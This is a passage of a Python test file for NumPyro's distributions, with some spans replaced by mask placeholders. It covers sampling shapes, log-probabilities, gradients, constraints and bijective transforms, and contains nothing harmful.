token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n<mask token>\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\n<mask token>\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\n<mask token>\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n 